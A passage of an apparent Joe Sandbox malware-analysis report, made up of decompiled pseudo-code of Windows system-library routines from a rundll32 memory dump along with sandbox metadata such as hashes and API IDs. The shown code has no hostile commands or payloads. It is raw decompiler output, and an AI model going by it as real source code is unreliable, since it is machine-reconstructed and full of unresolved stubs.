                                                                                            				intOrPtr _v44;
                                                                                            				signed int* _v48;
                                                                                            				signed int _v52;
                                                                                            				signed int _v56;
                                                                                            				intOrPtr _v60;
                                                                                            				intOrPtr _v64;
                                                                                            				intOrPtr _v68;
                                                                                            				intOrPtr _v72;
                                                                                            				intOrPtr _v76;
                                                                                            				char _v77;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				intOrPtr* _t65;
                                                                                            				intOrPtr _t67;
                                                                                            				intOrPtr _t68;
                                                                                            				char* _t73;
                                                                                            				intOrPtr _t77;
                                                                                            				intOrPtr _t78;
                                                                                            				signed int _t82;
                                                                                            				intOrPtr _t83;
                                                                                            				void* _t87;
                                                                                            				char _t88;
                                                                                            				intOrPtr* _t89;
                                                                                            				intOrPtr _t91;
                                                                                            				void* _t97;
                                                                                            				intOrPtr _t100;
                                                                                            				void* _t102;
                                                                                            				void* _t107;
                                                                                            				signed int _t108;
                                                                                            				intOrPtr* _t112;
                                                                                            				void* _t113;
                                                                                            				intOrPtr* _t114;
                                                                                            				intOrPtr _t115;
                                                                                            				intOrPtr _t116;
                                                                                            				intOrPtr _t117;
                                                                                            				signed int _t118;
                                                                                            				void* _t130;
                                                                                            
                                                                                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                            				_v8 =  *0x46cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                            				_t112 = __ecx;
                                                                                            				_v77 = __edx;
                                                                                            				_v48 = __ecx;
                                                                                            				_v28 = 0;
                                                                                            				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                            				_t105 =  *_t5;
                                                                                            				_v20 = 0;
                                                                                            				_v16 = 0;
                                                                                            				if(_t105 == 0) {
                                                                                            					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                            					_t60 =  *__ecx |  *_t50;
                                                                                            					if(( *__ecx |  *_t50) != 0) {
                                                                                            						 *__ecx = 0;
                                                                                            						__ecx[1] = 0;
                                                                                            						if(E045F7D50() != 0) {
                                                                                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            						} else {
                                                                                            							_t65 = 0x7ffe0386;
                                                                                            						}
                                                                                            						if( *_t65 != 0) {
                                                                                            							E046A8CD6(_t112);
                                                                                            						}
                                                                                            						_push(0);
                                                                                            						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                            						_push( *_t52);
                                                                                            						_t60 = E04619E20();
                                                                                            					}
                                                                                            					L20:
                                                                                            					_pop(_t107);
                                                                                            					_pop(_t113);
                                                                                            					_pop(_t87);
                                                                                            					return E0461B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                            				}
                                                                                            				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                            				_t67 =  *_t8;
                                                                                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                            				_t108 =  *(_t67 + 0x14);
                                                                                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                            				_t105 = 0x2710;
                                                                                            				asm("sbb eax, edi");
                                                                                            				_v44 = _t88;
                                                                                            				_v52 = _t108;
                                                                                            				_t60 = E0461CE00(_t97, _t68, 0x2710, 0);
                                                                                            				_v56 = _t60;
                                                                                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                            					L3:
                                                                                            					 *(_t112 + 0x44) = _t60;
                                                                                            					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                            					 *_t112 = _t88;
                                                                                            					 *(_t112 + 4) = _t108;
                                                                                            					_v20 = _t60 * 0x2710;
                                                                                            					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                            					if(_v77 != 0) {
                                                                                            						L16:
                                                                                            						_v36 = _t88;
                                                                                            						_v32 = _t108;
                                                                                            						if(E045F7D50() != 0) {
                                                                                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            						} else {
                                                                                            							_t73 = 0x7ffe0386;
                                                                                            						}
                                                                                            						if( *_t73 != 0) {
                                                                                            							_t105 = _v40;
                                                                                            							E046A8F6A(_t112, _v40, _t88, _t108);
                                                                                            						}
                                                                                            						_push( &_v28);
                                                                                            						_push(0);
                                                                                            						_push( &_v36);
                                                                                            						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                            						_push( *_t48);
                                                                                            						_t60 = E0461AF60();
                                                                                            						goto L20;
                                                                                            					} else {
                                                                                            						_t89 = 0x7ffe03b0;
                                                                                            						do {
                                                                                            							_t114 = 0x7ffe0010;
                                                                                            							do {
                                                                                            								_t77 =  *0x46c8628; // 0x0
                                                                                            								_v68 = _t77;
                                                                                            								_t78 =  *0x46c862c; // 0x0
                                                                                            								_v64 = _t78;
                                                                                            								_v72 =  *_t89;
                                                                                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                            								while(1) {
                                                                                            									_t105 =  *0x7ffe000c;
                                                                                            									_t100 =  *0x7ffe0008;
                                                                                            									if(_t105 ==  *_t114) {
                                                                                            										goto L8;
                                                                                            									}
                                                                                            									asm("pause");
                                                                                            								}
                                                                                            								L8:
                                                                                            								_t89 = 0x7ffe03b0;
                                                                                            								_t115 =  *0x7ffe03b0;
                                                                                            								_t82 =  *0x7FFE03B4;
                                                                                            								_v60 = _t115;
                                                                                            								_t114 = 0x7ffe0010;
                                                                                            								_v56 = _t82;
                                                                                            							} while (_v72 != _t115 || _v76 != _t82);
                                                                                            							_t83 =  *0x46c8628; // 0x0
                                                                                            							_t116 =  *0x46c862c; // 0x0
                                                                                            							_v76 = _t116;
                                                                                            							_t117 = _v68;
                                                                                            						} while (_t117 != _t83 || _v64 != _v76);
                                                                                            						asm("sbb edx, [esp+0x24]");
                                                                                            						_t102 = _t100 - _v60 - _t117;
                                                                                            						_t112 = _v48;
                                                                                            						_t91 = _v44;
                                                                                            						asm("sbb edx, eax");
                                                                                            						_t130 = _t105 - _v52;
                                                                                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                            							_t88 = _t102 - _t91;
                                                                                            							asm("sbb edx, edi");
                                                                                            							_t108 = _t105;
                                                                                            						} else {
                                                                                            							_t88 = 0;
                                                                                            							_t108 = 0;
                                                                                            						}
                                                                                            						goto L16;
                                                                                            					}
                                                                                            				} else {
                                                                                            					if( *(_t112 + 0x44) == _t60) {
                                                                                            						goto L20;
                                                                                            					}
                                                                                            					goto L3;
                                                                                            				}
                                                                                            			}


                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045FB9A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 885266447-0
                                                                                            • Opcode ID: 3fe397728bd8894f0ff31567d02785147eb7a937ce0c61d6f969677bfb621244
                                                                                            • Instruction ID: d88dbec4b2d0a014fdc19eea26745e8d32ef6dc6beb303efc8de68c58de89766
                                                                                            • Opcode Fuzzy Hash: 3fe397728bd8894f0ff31567d02785147eb7a937ce0c61d6f969677bfb621244
                                                                                            • Instruction Fuzzy Hash: 2B5157B1A08341CFC720DF29C88092ABBE5FB88654F14896EF6D587354E731F844DB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 78%
                                                                                            			E045DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                            				signed int _t65;
                                                                                            				signed short _t69;
                                                                                            				intOrPtr _t70;
                                                                                            				signed short _t85;
                                                                                            				void* _t86;
                                                                                            				signed short _t89;
                                                                                            				signed short _t91;
                                                                                            				intOrPtr _t92;
                                                                                            				intOrPtr _t97;
                                                                                            				intOrPtr* _t98;
                                                                                            				signed short _t99;
                                                                                            				signed short _t101;
                                                                                            				void* _t102;
                                                                                            				char* _t103;
                                                                                            				signed short _t104;
                                                                                            				intOrPtr* _t110;
                                                                                            				void* _t111;
                                                                                            				void* _t114;
                                                                                            				intOrPtr* _t115;
                                                                                            
                                                                                            				_t109 = __esi;
                                                                                            				_t108 = __edi;
                                                                                            				_t106 = __edx;
                                                                                            				_t95 = __ebx;
                                                                                            				_push(0x90);
                                                                                            				_push(0x46af7a8);
                                                                                            				E0462D0E8(__ebx, __edi, __esi);
                                                                                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                            				if(__edx == 0xffffffff) {
                                                                                            					L6:
                                                                                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                            					__eflags = _t65 & 0x00000002;
                                                                                            					if((_t65 & 0x00000002) != 0) {
                                                                                            						L3:
                                                                                            						L4:
                                                                                            						return E0462D130(_t95, _t108, _t109);
                                                                                            					}
                                                                                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                            					_t108 = 0;
                                                                                            					_t109 = 0;
                                                                                            					_t95 = 0;
                                                                                            					__eflags = 0;
                                                                                            					while(1) {
                                                                                            						__eflags = _t95 - 0x200;
                                                                                            						if(_t95 >= 0x200) {
                                                                                            							break;
                                                                                            						}
                                                                                            						E0461D000(0x80);
                                                                                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                            						_t108 = _t115;
                                                                                            						_t95 = _t95 - 0xffffff80;
                                                                                            						_t17 = _t114 - 4;
                                                                                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                            						__eflags =  *_t17;
                                                                                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                            						_t102 = _t110 + 1;
                                                                                            						do {
                                                                                            							_t85 =  *_t110;
                                                                                            							_t110 = _t110 + 1;
                                                                                            							__eflags = _t85;
                                                                                            						} while (_t85 != 0);
                                                                                            						_t111 = _t110 - _t102;
                                                                                            						_t21 = _t95 - 1; // -129
                                                                                            						_t86 = _t21;
                                                                                            						__eflags = _t111 - _t86;
                                                                                            						if(_t111 > _t86) {
                                                                                            							_t111 = _t86;
                                                                                            						}
                                                                                            						E0461F3E0(_t108, _t106, _t111);
                                                                                            						_t115 = _t115 + 0xc;
                                                                                            						_t103 = _t111 + _t108;
                                                                                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                            						_t89 = _t95 - _t111;
                                                                                            						__eflags = _t89;
                                                                                            						_push(0);
                                                                                            						if(_t89 == 0) {
                                                                                            							L15:
                                                                                            							_t109 = 0xc000000d;
                                                                                            							goto L16;
                                                                                            						} else {
                                                                                            							__eflags = _t89 - 0x7fffffff;
                                                                                            							if(_t89 <= 0x7fffffff) {
                                                                                            								L16:
                                                                                            								 *(_t114 - 0x94) = _t109;
                                                                                            								__eflags = _t109;
                                                                                            								if(_t109 < 0) {
                                                                                            									__eflags = _t89;
                                                                                            									if(_t89 != 0) {
                                                                                            										 *_t103 = 0;
                                                                                            									}
                                                                                            									L26:
                                                                                            									 *(_t114 - 0xa0) = _t109;
                                                                                            									 *(_t114 - 4) = 0xfffffffe;
                                                                                            									__eflags = _t109;
                                                                                            									if(_t109 >= 0) {
                                                                                            										L31:
                                                                                            										_t98 = _t108;
                                                                                            										_t39 = _t98 + 1; // 0x1
                                                                                            										_t106 = _t39;
                                                                                            										do {
                                                                                            											_t69 =  *_t98;
                                                                                            											_t98 = _t98 + 1;
                                                                                            											__eflags = _t69;
                                                                                            										} while (_t69 != 0);
                                                                                            										_t99 = _t98 - _t106;
                                                                                            										__eflags = _t99;
                                                                                            										L34:
                                                                                            										_t70 =  *[fs:0x30];
                                                                                            										__eflags =  *((char*)(_t70 + 2));
                                                                                            										if( *((char*)(_t70 + 2)) != 0) {
                                                                                            											L40:
                                                                                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                            											 *(_t114 - 4) = 1;
                                                                                            											_push(_t114 - 0x74);
                                                                                            											L0462DEF0(_t99, _t106);
                                                                                            											 *(_t114 - 4) = 0xfffffffe;
                                                                                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                            											goto L3;
                                                                                            										}
                                                                                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                            											goto L40;
                                                                                            										}
                                                                                            										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                            										_push(_t99 & 0x0000ffff);
                                                                                            										_push(_t108);
                                                                                            										_push(1);
                                                                                            										_t101 = E0461B280();
                                                                                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                            										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                            											__eflags = _t101 - 0x80000003;
                                                                                            											if(_t101 == 0x80000003) {
                                                                                            												E0461B7E0(1);
                                                                                            												_t101 = 0;
                                                                                            												__eflags = 0;
                                                                                            											}
                                                                                            										}
                                                                                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                            										goto L4;
                                                                                            									}
                                                                                            									__eflags = _t109 - 0x80000005;
                                                                                            									if(_t109 == 0x80000005) {
                                                                                            										continue;
                                                                                            									}
                                                                                            									break;
                                                                                            								}
                                                                                            								 *(_t114 - 0x90) = 0;
                                                                                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                            								_t91 = E0461E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                            								_t115 = _t115 + 0x10;
                                                                                            								_t104 = _t91;
                                                                                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                            								__eflags = _t104;
                                                                                            								if(_t104 < 0) {
                                                                                            									L21:
                                                                                            									_t109 = 0x80000005;
                                                                                            									 *(_t114 - 0x90) = 0x80000005;
                                                                                            									L22:
                                                                                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                            									L23:
                                                                                            									 *(_t114 - 0x94) = _t109;
                                                                                            									goto L26;
                                                                                            								}
                                                                                            								__eflags = _t104 - _t92;
                                                                                            								if(__eflags > 0) {
                                                                                            									goto L21;
                                                                                            								}
                                                                                            								if(__eflags == 0) {
                                                                                            									goto L22;
                                                                                            								}
                                                                                            								goto L23;
                                                                                            							}
                                                                                            							goto L15;
                                                                                            						}
                                                                                            					}
                                                                                            					__eflags = _t109;
                                                                                            					if(_t109 >= 0) {
                                                                                            						goto L31;
                                                                                            					}
                                                                                            					__eflags = _t109 - 0x80000005;
                                                                                            					if(_t109 != 0x80000005) {
                                                                                            						goto L31;
                                                                                            					}
                                                                                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                            					_t38 = _t95 - 1; // -129
                                                                                            					_t99 = _t38;
                                                                                            					goto L34;
                                                                                            				}
                                                                                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                            					__eflags = __edx - 0x65;
                                                                                            					if(__edx != 0x65) {
                                                                                            						goto L2;
                                                                                            					}
                                                                                            					goto L6;
                                                                                            				}
                                                                                            				L2:
                                                                                            				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                            				_push(_t106);
                                                                                            				if(E0461A890() != 0) {
                                                                                            					goto L6;
                                                                                            				}
                                                                                            				goto L3;
                                                                                            			}























                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: _vswprintf_s
                                                                                            • String ID:
                                                                                            • API String ID: 677850445-0
                                                                                            • Opcode ID: fbcd2050e92de773afc38a7b32e6dae58200e570e981e5a6d6ce88039cb3fa54
                                                                                            • Instruction ID: 5c5d908daba5c72893a337a01b8875d4ec994c2bace1161e9982bab3429fac57
                                                                                            • Opcode Fuzzy Hash: fbcd2050e92de773afc38a7b32e6dae58200e570e981e5a6d6ce88039cb3fa54
                                                                                            • Instruction Fuzzy Hash: 5351D171D002998EEB31CF68C844BAEFBB1BF04715F1441ADD859AB391EB74A941DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 82%
                                                                                            			E04602581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                            				signed int _v8;
                                                                                            				signed int _v16;
                                                                                            				unsigned int _v24;
                                                                                            				void* _v28;
                                                                                            				signed int _v32;
                                                                                            				unsigned int _v36;
                                                                                            				void* _v37;
                                                                                            				signed int _v40;
                                                                                            				signed int _v44;
                                                                                            				signed int _v48;
                                                                                            				signed int _v52;
                                                                                            				signed int _v56;
                                                                                            				intOrPtr _v60;
                                                                                            				signed int _v64;
                                                                                            				signed int _v68;
                                                                                            				signed int _v72;
                                                                                            				signed int _v76;
                                                                                            				signed int _v80;
                                                                                            				signed int _t239;
                                                                                            				signed int _t243;
                                                                                            				void* _t244;
                                                                                            				void* _t246;
                                                                                            				signed int _t248;
                                                                                            				signed int _t249;
                                                                                            				void* _t251;
                                                                                            				signed int _t258;
                                                                                            				signed int _t260;
                                                                                            				intOrPtr _t262;
                                                                                            				signed int _t265;
                                                                                            				signed int _t272;
                                                                                            				signed int _t275;
                                                                                            				signed int _t283;
                                                                                            				intOrPtr _t289;
                                                                                            				signed int _t291;
                                                                                            				signed int _t293;
                                                                                            				void* _t295;
                                                                                            				signed int _t296;
                                                                                            				unsigned int _t299;
                                                                                            				signed int _t303;
                                                                                            				signed int _t305;
                                                                                            				signed int _t309;
                                                                                            				intOrPtr _t321;
                                                                                            				signed int _t330;
                                                                                            				signed int _t332;
                                                                                            				signed int _t333;
                                                                                            				signed int _t337;
                                                                                            				signed int _t338;
                                                                                            				void* _t340;
                                                                                            				signed int _t341;
                                                                                            				signed int _t343;
                                                                                            				signed int _t346;
                                                                                            				void* _t347;
                                                                                            				void* _t349;
                                                                                            
                                                                                            				_t343 = _t346;
                                                                                            				_t347 = _t346 - 0x4c;
                                                                                            				_v8 =  *0x46cd360 ^ _t343;
                                                                                            				_push(__ebx);
                                                                                            				_push(__esi);
                                                                                            				_push(__edi);
                                                                                            				_t337 = 0x46cb2e8;
                                                                                            				_v56 = _a4;
                                                                                            				_v48 = __edx;
                                                                                            				_v60 = __ecx;
                                                                                            				_t299 = 0;
                                                                                            				_v80 = 0;
                                                                                            				asm("movsd");
                                                                                            				_v64 = 0;
                                                                                            				_v76 = 0;
                                                                                            				_v72 = 0;
                                                                                            				asm("movsd");
                                                                                            				_v44 = 0;
                                                                                            				_v52 = 0;
                                                                                            				_v68 = 0;
                                                                                            				asm("movsd");
                                                                                            				_v32 = 0;
                                                                                            				_v36 = 0;
                                                                                            				asm("movsd");
                                                                                            				_v16 = 0;
                                                                                            				_t349 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                                                            				_t289 = 0x48;
                                                                                            				_t319 = 0 | _t349 == 0x00000000;
                                                                                            				_t330 = 0;
                                                                                            				_v37 = _t349 == 0;
                                                                                            				if(_v48 <= 0) {
                                                                                            					L16:
                                                                                            					_t45 = _t289 - 0x48; // 0x0
                                                                                            					__eflags = _t45 - 0xfffe;
                                                                                            					if(_t45 > 0xfffe) {
                                                                                            						_t338 = 0xc0000106;
                                                                                            						goto L32;
                                                                                            					} else {
                                                                                            						_t337 = L045F4620(_t299,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t289);
                                                                                            						_v52 = _t337;
                                                                                            						__eflags = _t337;
                                                                                            						if(_t337 == 0) {
                                                                                            							_t338 = 0xc0000017;
                                                                                            							goto L32;
                                                                                            						} else {
                                                                                            							 *(_t337 + 0x44) =  *(_t337 + 0x44) & 0x00000000;
                                                                                            							_t50 = _t337 + 0x48; // 0x48
                                                                                            							_t332 = _t50;
                                                                                            							_t319 = _v32;
                                                                                            							 *((intOrPtr*)(_t337 + 0x3c)) = _t289;
                                                                                            							_t291 = 0;
                                                                                            							 *((short*)(_t337 + 0x30)) = _v48;
                                                                                            							__eflags = _t319;
                                                                                            							if(_t319 != 0) {
                                                                                            								 *(_t337 + 0x18) = _t332;
                                                                                            								__eflags = _t319 - 0x46c8478;
                                                                                            								 *_t337 = ((0 | _t319 == 0x046c8478) - 0x00000001 & 0xfffffffb) + 7;
                                                                                            								E0461F3E0(_t332,  *((intOrPtr*)(_t319 + 4)),  *_t319 & 0x0000ffff);
                                                                                            								_t319 = _v32;
                                                                                            								_t347 = _t347 + 0xc;
                                                                                            								_t291 = 1;
                                                                                            								__eflags = _a8;
                                                                                            								_t332 = _t332 + (( *_t319 & 0x0000ffff) >> 1) * 2;
                                                                                            								if(_a8 != 0) {
                                                                                            									_t283 = E046639F2(_t332);
                                                                                            									_t319 = _v32;
                                                                                            									_t332 = _t283;
                                                                                            								}
                                                                                            							}
                                                                                            							_t303 = 0;
                                                                                            							_v16 = 0;
                                                                                            							__eflags = _v48;
                                                                                            							if(_v48 <= 0) {
                                                                                            								L31:
                                                                                            								_t338 = _v68;
                                                                                            								__eflags = 0;
                                                                                            								 *((short*)(_t332 - 2)) = 0;
                                                                                            								goto L32;
                                                                                            							} else {
                                                                                            								_t293 = _t337 + _t291 * 4;
                                                                                            								_v56 = _t293;
                                                                                            								do {
                                                                                            									__eflags = _t319;
                                                                                            									if(_t319 != 0) {
                                                                                            										_t239 =  *(_v60 + _t303 * 4);
                                                                                            										__eflags = _t239;
                                                                                            										if(_t239 == 0) {
                                                                                            											goto L30;
                                                                                            										} else {
                                                                                            											__eflags = _t239 == 5;
                                                                                            											if(_t239 == 5) {
                                                                                            												goto L30;
                                                                                            											} else {
                                                                                            												goto L22;
                                                                                            											}
                                                                                            										}
                                                                                            									} else {
                                                                                            										L22:
                                                                                            										 *_t293 =  *(_v60 + _t303 * 4);
                                                                                            										 *(_t293 + 0x18) = _t332;
                                                                                            										_t243 =  *(_v60 + _t303 * 4);
                                                                                            										__eflags = _t243 - 8;
                                                                                            										if(_t243 > 8) {
                                                                                            											goto L56;
                                                                                            										} else {
                                                                                            											switch( *((intOrPtr*)(_t243 * 4 +  &M04602959))) {
                                                                                            												case 0:
                                                                                            													__ax =  *0x46c8488;
                                                                                            													__eflags = __ax;
                                                                                            													if(__ax == 0) {
                                                                                            														goto L29;
                                                                                            													} else {
                                                                                            														__ax & 0x0000ffff = E0461F3E0(__edi,  *0x46c848c, __ax & 0x0000ffff);
                                                                                            														__eax =  *0x46c8488 & 0x0000ffff;
                                                                                            														goto L26;
                                                                                            													}
                                                                                            													goto L108;
                                                                                            												case 1:
                                                                                            													L45:
                                                                                            													E0461F3E0(_t332, _v80, _v64);
                                                                                            													_t278 = _v64;
                                                                                            													goto L26;
                                                                                            												case 2:
                                                                                            													 *0x46c8480 & 0x0000ffff = E0461F3E0(__edi,  *0x46c8484,  *0x46c8480 & 0x0000ffff);
                                                                                            													__eax =  *0x46c8480 & 0x0000ffff;
                                                                                            													__eax = ( *0x46c8480 & 0x0000ffff) >> 1;
                                                                                            													__edi = __edi + __eax * 2;
                                                                                            													goto L28;
                                                                                            												case 3:
                                                                                            													__eax = _v44;
                                                                                            													__eflags = __eax;
                                                                                            													if(__eax == 0) {
                                                                                            														goto L29;
                                                                                            													} else {
                                                                                            														__esi = __eax + __eax;
                                                                                            														__eax = E0461F3E0(__edi, _v72, __esi);
                                                                                            														__edi = __edi + __esi;
                                                                                            														__esi = _v52;
                                                                                            														goto L27;
                                                                                            													}
                                                                                            													goto L108;
                                                                                            												case 4:
                                                                                            													_push(0x2e);
                                                                                            													_pop(__eax);
                                                                                            													 *(__esi + 0x44) = __edi;
                                                                                            													 *__edi = __ax;
                                                                                            													__edi = __edi + 4;
                                                                                            													_push(0x3b);
                                                                                            													_pop(__eax);
                                                                                            													 *(__edi - 2) = __ax;
                                                                                            													goto L29;
                                                                                            												case 5:
                                                                                            													__eflags = _v36;
                                                                                            													if(_v36 == 0) {
                                                                                            														goto L45;
                                                                                            													} else {
                                                                                            														E0461F3E0(_t332, _v76, _v36);
                                                                                            														_t278 = _v36;
                                                                                            													}
                                                                                            													L26:
                                                                                            													_t347 = _t347 + 0xc;
                                                                                            													_t332 = _t332 + (_t278 >> 1) * 2 + 2;
                                                                                            													__eflags = _t332;
                                                                                            													L27:
                                                                                            													_push(0x3b);
                                                                                            													_pop(_t280);
                                                                                            													 *((short*)(_t332 - 2)) = _t280;
                                                                                            													goto L28;
                                                                                            												case 6:
                                                                                            													__ebx =  *0x46c575c;
                                                                                            													__eflags = __ebx - 0x46c575c;
                                                                                            													if(__ebx != 0x46c575c) {
                                                                                            														_push(0x3b);
                                                                                            														_pop(__esi);
                                                                                            														do {
                                                                                            															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                                            															E0461F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                                            															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                                            															__edi = __edi + __eax * 2;
                                                                                            															__edi = __edi + 2;
                                                                                            															 *(__edi - 2) = __si;
                                                                                            															__ebx =  *__ebx;
                                                                                            															__eflags = __ebx - 0x46c575c;
                                                                                            														} while (__ebx != 0x46c575c);
                                                                                            														__esi = _v52;
                                                                                            														__ecx = _v16;
                                                                                            														__edx = _v32;
                                                                                            													}
                                                                                            													__ebx = _v56;
                                                                                            													goto L29;
                                                                                            												case 7:
                                                                                            													 *0x46c8478 & 0x0000ffff = E0461F3E0(__edi,  *0x46c847c,  *0x46c8478 & 0x0000ffff);
                                                                                            													__eax =  *0x46c8478 & 0x0000ffff;
                                                                                            													__eax = ( *0x46c8478 & 0x0000ffff) >> 1;
                                                                                            													__eflags = _a8;
                                                                                            													__edi = __edi + __eax * 2;
                                                                                            													if(_a8 != 0) {
                                                                                            														__ecx = __edi;
                                                                                            														__eax = E046639F2(__ecx);
                                                                                            														__edi = __eax;
                                                                                            													}
                                                                                            													goto L28;
                                                                                            												case 8:
                                                                                            													__eax = 0;
                                                                                            													 *(__edi - 2) = __ax;
                                                                                            													 *0x46c6e58 & 0x0000ffff = E0461F3E0(__edi,  *0x46c6e5c,  *0x46c6e58 & 0x0000ffff);
                                                                                            													 *(__esi + 0x38) = __edi;
                                                                                            													__eax =  *0x46c6e58 & 0x0000ffff;
                                                                                            													__eax = ( *0x46c6e58 & 0x0000ffff) >> 1;
                                                                                            													__edi = __edi + __eax * 2;
                                                                                            													__edi = __edi + 2;
                                                                                            													L28:
                                                                                            													_t303 = _v16;
                                                                                            													_t319 = _v32;
                                                                                            													L29:
                                                                                            													_t293 = _t293 + 4;
                                                                                            													__eflags = _t293;
                                                                                            													_v56 = _t293;
                                                                                            													goto L30;
                                                                                            											}
                                                                                            										}
                                                                                            									}
                                                                                            									goto L108;
                                                                                            									L30:
                                                                                            									_t303 = _t303 + 1;
                                                                                            									_v16 = _t303;
                                                                                            									__eflags = _t303 - _v48;
                                                                                            								} while (_t303 < _v48);
                                                                                            								goto L31;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				} else {
                                                                                            					while(1) {
                                                                                            						L1:
                                                                                            						_t243 =  *(_v60 + _t330 * 4);
                                                                                            						if(_t243 > 8) {
                                                                                            							break;
                                                                                            						}
                                                                                            						switch( *((intOrPtr*)(_t243 * 4 +  &M04602935))) {
                                                                                            							case 0:
                                                                                            								__ax =  *0x46c8488;
                                                                                            								__eflags = __ax;
                                                                                            								if(__ax != 0) {
                                                                                            									__eax = __ax & 0x0000ffff;
                                                                                            									__ebx = __ebx + 2;
                                                                                            									__eflags = __ebx;
                                                                                            									goto L53;
                                                                                            								}
                                                                                            								goto L14;
